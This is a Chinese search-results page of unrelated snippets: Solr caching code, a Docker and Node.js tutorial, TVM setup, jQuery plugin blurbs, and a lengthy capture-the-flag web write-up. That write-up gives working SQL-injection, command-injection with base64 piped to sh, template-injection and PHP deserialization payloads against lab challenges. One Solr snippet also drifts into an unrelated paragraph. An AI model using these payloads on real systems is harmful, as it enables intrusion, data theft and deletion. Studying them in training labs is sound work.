[Json在线生成和解析工具 ]的搜索结果

...们有个叫Solr的小工具，专门负责在我们家里的文件堆里找东西。但是，它不是个孤军奋战的英雄，还需要借助外面的朋友——那个外部API，来给我们多提供一些额外的线索和细节，就像侦探在破案时需要咨询专家一样。这样，当我们用Solr搜索的时候，就能得到更丰富、更准确的结果了。我们使用Python和requests库来模拟这个过程： python import requests from solr import SolrClient solr_url = "http://localhost:8983/solr/core1" solr_client = SolrClient(solr_url) def search(query): results = solr_client.search(query) for result in results: 外部API请求 external_data = fetch_external_metadata(result['id']) result['additional_info'] = external_data return results def fetch_external_metadata(doc_id): url = f"https://example.com/api/{doc_id}" response = requests.get(url) if response.status_code == 200: return response.json() else: return None 在这个例子中，fetch_external_metadata函数尝试从外部API获取元数据，如果请求失败或API不可用，那么该结果将被标记为未获取到数据。当外部服务出现延迟或中断时，这将直接影响到Solr的查询效率。 三、优化策略 1. 缓存策略 为了避免频繁请求外部服务，可以引入缓存机制。对于频繁访问且数据变化不大的元数据，可以在本地缓存一段时间。当外部服务不可用时，可以回退使用缓存数据，直到服务恢复。 python class ExternalMetadataCache: def __init__(self, ttl=600): self.cache = {} self.ttl = ttl def get(self, doc_id): if doc_id not in self.cache or (self.cache[doc_id]['timestamp'] + self.ttl) < time.time(): self.cache[doc_id] = {'data': fetch_external_metadata(doc_id), 'timestamp': time.time()} return self.cache[doc_id]['data'] metadata_cache = ExternalMetadataCache() def fetch_external_metadata_safe(doc_id): return metadata_cache.get(doc_id) 2. 重试机制 在请求外部服务时添加重试逻辑，当第一次请求失败后，可以设置一定的时间间隔后再次尝试，直到成功或达到最大重试次数。 python def fetch_external_metadata_retriable(doc_id, max_retries=3, retry_delay=5): for i in range(max_retries): try: return fetch_external_metadata(doc_id) except Exception as e: print(f"Attempt {i+1} failed with error: {e}. Retrying in {retry_delay} seconds...") time.sleep(retry_delay) raise Exception("Max retries reached.") 四、结论与展望 通过上述策略，我们可以在一定程度上减轻外部服务依赖对Solr性能的影响。然而，重要的是要持续监控系统的运行状况，并根据实际情况调整优化措施。嘿，你听说了吗？科技这玩意儿啊，那可是越来越牛了！你看，现在就有人在琢磨怎么对付那些让人上瘾的东西。将来啊，说不定能搞出个既高效又结实的办法，帮咱们摆脱这个烦恼。想想都挺激动的，对吧？哎呀，兄弟！构建一个稳定又跑得快的搜索系统，那可得好好琢磨琢磨外部服务这事儿。你知道的，这些服务就像是你家里的电器，得选对了，用好了，整个家才能舒舒服服的。所以啊，咱们得先搞清楚这些服务都是干啥的，它们之间怎么配合，还有万一出了点小状况，咱们能不能快速应对。这样，咱们的搜索系统才能稳如泰山，嗖嗖地飞快，用户一搜就满意，那才叫真本事呢！ --- 请注意，以上代码示例是基于Python和相关库编写的，实际应用时需要根据具体环境和技术栈进行相应的调整。

... 这会在当前目录下生成一个package.json文件，用于管理项目的依赖。接下来，我们随便写点代码让这个项目动起来。比如新建一个index.js文件，内容如下： javascript // index.js const http = require('http'); const hostname = '127.0.0.1'; const port = 3000; const server = http.createServer((req, res) => { res.statusCode = 200; res.setHeader('Content-Type', 'text/plain'); res.end('Hello World\n'); }); server.listen(port, hostname, () => { console.log(Server running at http://${hostname}:${port}/); }); 现在你可以直接运行它看看效果： bash node index.js 打开浏览器访问http://127.0.0.1:3000/，你会看到“Hello World”。不错，我们的基础项目已经搭建好了！ --- 4. 第一步 编写Dockerfile 接下来我们要做的就是给这个项目添加Docker的支持。为此，我们需要创建一个特殊的文件叫Dockerfile。这个名字是固定的，不能改哦。 进入项目根目录，创建一个空文件名为Dockerfile，然后在里面输入以下内容： dockerfile 使用官方的Node.js镜像作为基础镜像 FROM node:16-alpine 设置工作目录 WORKDIR /app 将当前目录下的所有文件复制到容器中的/app目录 COPY . /app 安装项目依赖 RUN npm install 暴露端口 EXPOSE 3000 启动应用 CMD ["node", "index.js"] 这段代码看起来有点复杂，但其实逻辑很简单： 1. FROM node:16-alpine 告诉Docker从官方的Node.js 16版本的Alpine镜像开始构建。 2. WORKDIR /app 指定容器内的工作目录为/app。 3. COPY . /app 把当前项目的文件拷贝到容器的/app目录下。 4. RUN npm install 在容器内执行npm install命令，安装项目的依赖。 5. EXPOSE 3000 声明应用监听的端口号。 6. CMD ["node", "index.js"]：定义容器启动时默认执行的命令。 保存完Dockerfile后，我们可以试着构建镜像了。 --- 5. 构建并运行Docker镜像 在项目根目录下运行以下命令来构建镜像： bash docker build -t my-node-app . 这里的. 表示当前目录，my-node-app是我们给镜像起的名字。构建完成后，可以用以下命令查看是否成功生成了镜像： bash docker images 输出应该类似这样： REPOSITORY TAG IMAGE ID CREATED SIZE my-node-app latest abcdef123456 2 minutes ago 150MB 接着，我们可以启动容器试试看： bash docker run -d -p 3000:3000 my-node-app 参数解释： - -d：以后台模式运行容器。 - -p 3000:3000：将主机的3000端口映射到容器的3000端口。 - my-node-app：使用的镜像名称。 启动成功后，访问http://localhost:3000/，你会发现依然可以看到“Hello World”！这说明我们的Docker化部署已经初步完成了。 --- 6. 进阶 多阶段构建优化镜像大小 虽然上面的方法可行，但生成的镜像体积有点大（大约150MB左右）。有没有办法让它更小呢？答案是有！这就是Docker的“多阶段构建”。 修改后的Dockerfile如下： dockerfile 第一阶段：构建阶段 FROM node:16-alpine AS builder WORKDIR /app COPY package.json ./ RUN npm install COPY . . RUN npm run build 假设你有一个build脚本 第二阶段：运行阶段 FROM node:16-alpine WORKDIR /app COPY --from=builder /app/dist ./dist 假设build后的文件存放在dist目录下 COPY package.json ./ RUN npm install --production EXPOSE 3000 CMD ["node", "dist/index.js"] 这里的关键在于“--from=builder”，它允许我们在第二个阶段复用第一个阶段的结果。这样就能让开发工具和测试依赖 stays 在它们该待的地方，而不是一股脑全塞进最终的镜像里，这样一来镜像就能瘦成一道闪电啦！ --- 7. 总结与展望 写到这里，我相信你已经对如何用Docker部署Node.js应用有了基本的认识。虽然过程中可能会遇到各种问题，但每一次尝试都是成长的机会。记得多查阅官方文档，多动手实践，这样才能真正掌握这项技能。 未来，随着云计算和微服务架构的普及，容器化将成为每个开发者必备的技能之一。所以，别犹豫啦，赶紧去试试呗！要是你有什么不懂的，或者想聊聊自己的经历，就尽管来找我聊天，咱们一起唠唠~咱们一起进步！ 最后，祝大家都能早日成为Docker高手！😄

...  大约5分钟，即可生成我们需要的两个共享链接库：libtvm.so 和 libtvm_runtime.so 1.4 验证安装是否成功   tvm版本验证： import tvmprint(tvm.__version__)   pytorch模型验证： from_pytorch.py https://tvm.apache.org/docs/how_to/compile_models/from_pytorch.html ps: TVM supports PyTorch 1.7 and 1.4. Other versions may be unstable.import tvmfrom tvm import relayfrom tvm.contrib.download import download_testdataimport numpy as np PyTorch importsimport torchimport torchvision Load a pretrained PyTorch model -------------------------------model_name = "resnet18"model = getattr(torchvision.models, model_name)(pretrained=True) or model = torchvision.models.resnet18(pretrained=True) or pth_file = 'resnet18-f37072fd.pth' model = torchvision.models.resnet18() ckpt = torch.load(pth_file) model.load_state_dict(ckpt)model = model.eval() We grab the TorchScripted model via tracinginput_shape = [1, 3, 224, 224]input_data = torch.randn(input_shape)scripted_model = torch.jit.trace(model, input_data).eval() Load a test image ----------------- Classic cat example!from PIL import Image img_url = "https://github.com/dmlc/mxnet.js/blob/main/data/cat.png?raw=true" img_path = download_testdata(img_url, "cat.png", module="data")img_path = 'cat.png'img = Image.open(img_path).resize((224, 224)) Preprocess the image and convert to tensorfrom torchvision import transformsmy_preprocess = transforms.Compose([transforms.Resize(256),transforms.CenterCrop(224),transforms.ToTensor(),transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),])img = my_preprocess(img)img = np.expand_dims(img, 0) Import the graph to Relay ------------------------- Convert PyTorch graph to Relay graph. The input name can be arbitrary.input_name = "input0"shape_list = [(input_name, img.shape)]mod, params = relay.frontend.from_pytorch(scripted_model, shape_list) Relay Build ----------- Compile the graph to llvm target with given input specification.target = tvm.target.Target("llvm", host="llvm")dev = tvm.cpu(0)with tvm.transform.PassContext(opt_level=3):lib = relay.build(mod, target=target, params=params) Execute the portable graph on TVM --------------------------------- Now we can try deploying the compiled model on target.from tvm.contrib import graph_executordtype = "float32"m = graph_executor.GraphModule(lib["default"](dev)) Set inputsm.set_input(input_name, tvm.nd.array(img.astype(dtype))) Executem.run() Get outputstvm_output = m.get_output(0) Look up synset name ------------------- Look up prediction top 1 index in 1000 class synset. synset_url = "".join( [ "https://raw.githubusercontent.com/Cadene/", "pretrained-models.pytorch/master/data/", "imagenet_synsets.txt", ] ) synset_name = "imagenet_synsets.txt" synset_path = download_testdata(synset_url, synset_name, module="data") https://raw.githubusercontent.com/Cadene/pretrained-models.pytorch/master/data/imagenet_synsets.txtsynset_path = 'imagenet_synsets.txt'with open(synset_path) as f:synsets = f.readlines()synsets = [x.strip() for x in synsets]splits = [line.split(" ") for line in synsets]key_to_classname = {spl[0]: " ".join(spl[1:]) for spl in splits} class_url = "".join( [ "https://raw.githubusercontent.com/Cadene/", "pretrained-models.pytorch/master/data/", "imagenet_classes.txt", ] ) class_name = "imagenet_classes.txt" class_path = download_testdata(class_url, class_name, module="data") https://raw.githubusercontent.com/Cadene/pretrained-models.pytorch/master/data/imagenet_classes.txtclass_path = 'imagenet_classes.txt'with open(class_path) as f:class_id_to_key = f.readlines()class_id_to_key = [x.strip() for x in class_id_to_key] Get top-1 result for TVMtop1_tvm = np.argmax(tvm_output.numpy()[0])tvm_class_key = class_id_to_key[top1_tvm] Convert input to PyTorch variable and get PyTorch result for comparisonwith torch.no_grad():torch_img = torch.from_numpy(img)output = model(torch_img) Get top-1 result for PyTorchtop1_torch = np.argmax(output.numpy())torch_class_key = class_id_to_key[top1_torch]print("Relay top-1 id: {}, class name: {}".format(top1_tvm, key_to_classname[tvm_class_key]))print("Torch top-1 id: {}, class name: {}".format(top1_torch, key_to_classname[torch_class_key])) 2. 配置vscode   安装两个vscode远程连接所需的两个插件，具体如下图所示：   安装完成之后，在左侧工具栏会出现一个图标，点击图标进行ssh配置： ssh yourname@yourip -A   然后右键选择在当前窗口进行连接：   除此之外，还可以设置免费登录，具体可参考这篇文章。   当然，也可以使用windows本地的WSL2，vscode连接WSL还需要安装WSL和Dev Containers这两个插件。   在服务器端执行code .会自动安装vscode server，安装位置在用户的根目录下： 3. 安装FFI Navigator   由于TVM是由Python和C++混合开发，且大多数的IDE仅支持在同一种语言中查找函数定义，因此对于跨语言的FFI 调用，即Python跳转到C++或者C++跳转到Python，vscode是做不到的。虽然解决这个问题在技术上可能非常具有挑战性，但我们可以通过构建一个与FFI注册码模式匹配并恢复必要信息的项目特定分析器来解决这个问题，FFI Navigator就这样诞生了，作者仍然是陈天奇博士。   安装方式如下： 建议使用源码安装git clone https://github.com/tqchen/ffi-navigator.git 安装python依赖cd ffi-navigator/pythonpython setyp.py install   vscode需要安装FFI Navigator插件，直接搜索安装即可(安装到服务器端)。   最后需要在.vscode/setting.json进行配置，内容如下： {"python.analysis.extraPaths": ["${workspaceFolder}/python"], // 添加额外导入路径, 告诉pylance自定义的python库在哪里"ffi_navigator.pythonpath": "/home/liyanpeng/anaconda3/envs/tvmenv/bin/python", // 配置FFI Navigator"python.defaultInterpreterPath": "/home/liyanpeng/anaconda3/envs/tvmenv/bin/python","files.associations": {"type_traits": "cpp","fstream": "cpp","thread": "cpp",".tcc": "cpp"} }   更详细内容可以参考项目链接。 结束语   对于vscode的使用技巧及C/C++相关的配置，这里不再详细的介绍了，感兴趣的小伙伴们可以了解下。 本篇文章为转载内容。原文链接：https://blog.csdn.net/qq_42730750/article/details/126723224。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...oducts服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回，一种是空白，一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母（除过滤的关键词外）都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符，不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接，但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式：pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接，而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候，mysql也可以把 || 作为字符串拼接。 修改完后，|| 就会被认为是字符串拼接符 MySQL中sql_mode参数，具体的看这里 解题思路1： payload：,1 查询语句：select ,1||flag from Flag 解题思路2： 堆叠注入，使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析： 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式：pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入：1’ 为'闭合 2.看字段：1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ，太像了，增加了过滤规则。 修改表名和set均不可用，所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据，也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了：cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x，低于7.3.16的7.3.x和低于7.4.4的7.4.x中，将get_headers（）与用户提供的URL一起使用时，如果URL包含零（\ 0）字符，则URL将被静默地截断。这可能会导致某些软件对get_headers（）的目标做出错误的假设，并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点： cve-2020-7066利用 老套路：先F12查看源码 发现提示：Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾，这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点： .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素，并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节，看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢？<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");} }else{die("再好好想想！");} }else{die("还想读flag，臭弟弟！");} }// highlight_file(__FILE__);?> 既然getshell基本不可能，那么考虑读源码 看源码，flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件，例如： <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数： localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点： current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步：读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下，利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数，此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由，就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的，参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的，名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象，hexdigest()是获得加密后的16进制字符串 urllib.unquote(） 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog，且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了：secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为：fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入： /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目： 1.tornado是一个python的模板，可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息，想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞，尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入： 查字段：1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表： [GXYCTF2019]Ping Ping Ping 考察：RCE的防护绕过 直接构造：?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格，使用拼接变量来拼接出Flag字符串： 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么：?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥，flag字眼也过滤了，bash也没了，不过sh没过滤： 继续构造payload： ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码，得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass，具体看这里 HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 1.删除空白符2.将某些字符转换为下划线（包括空格） scandir()：列出参数目录中的文件和目录 发现/被过滤了 ，可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload： 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典，要带路径 -r 递归跑(查到一个目录后，重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道，如果password=100，username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时，属性个数的值大于实际属性个数时，就可以 2.private修饰符的问题 private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover， 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法： flask session 伪造 具体，看这里 flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显： 1' uniunionon selselectect 1,2,3 over！正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接：https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...cript正则表达式解析与可视化浏览器插件，专为开发者设计，以直观易懂的方式呈现复杂的正则表达式结构。该插件能够无缝集成到基于jQuery的web项目中，用户只需输入或粘贴任何JavaScript兼容的正则表达式，Regulex即可实时解析并生成相应的流程图表示。这款工具通过清晰的图表展示正则表达式的匹配逻辑和分支结构，极大地简化了对正则表达式工作原理的理解过程。Regulex不仅适用于学习和教学场景，也方便开发者在实际编码过程中调试和优化正则表达式。其核心功能包括：即时可视化反馈，允许用户根据图表调整正则表达式直至满足需求；同时支持将生成的可视化流程图导出为图片格式，便于分享给团队成员、记录文档或者用于教程编写等用途。总之，Regulex作为一个实用且高效的正则表达式辅助工具，极大提升了开发效率，并降低了正则表达式的学习门槛。 点我下载 文件大小：137.14 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...所有查询参数，并将其解析为便于处理的JSON对象。同时，支持将新的参数集合或已更新的参数重新编码为URL查询字符串，进而实时更改浏览器地址栏中的URL状态，而无需刷新整个页面。此外，url.js还具备删除指定URL参数的能力，使得维护页面历史记录及实现平滑的状态管理变得更为便捷。总之，这款插件是构建现代Web应用程序时不可或缺的工具之一，它可以有效提升开发效率并增强用户体验，特别是在那些依赖于URL进行路由导航的应用中。 点我下载 文件大小：294.72 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

...载至插件中，即可自动解析文件内容并构建相应的HTML表格结构。这一过程不仅自动化程度高，而且效率显著，使得数据的可视化变得异常便捷。对于开发者而言，这意味着他们可以专注于业务逻辑的开发，而将数据处理的任务交给CsvToTable来完成，大大提升了开发效率和用户体验。此外，CsvToTable支持灵活的数据格式输入，无论是逗号分隔还是分号分隔的CSV文件，甚至包含特殊字符的文件，都可以被准确无误地解析并呈现为HTML表格。这种广泛的兼容性使得CsvToTable成为处理多种来源和格式数据的理想选择，适用于各种应用场景，从简单的数据分析到复杂的报表生成。总之，CsvToTable-CSV格式文件转HTML表格js插件以其简洁的API、高效的性能和出色的兼容性，为开发者提供了一个高效、可靠的工具，用于将CSV文件转换为HTML表格，极大地简化了数据展示的过程，提高了工作效率和用户体验。 点我下载 文件大小：10.69 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。

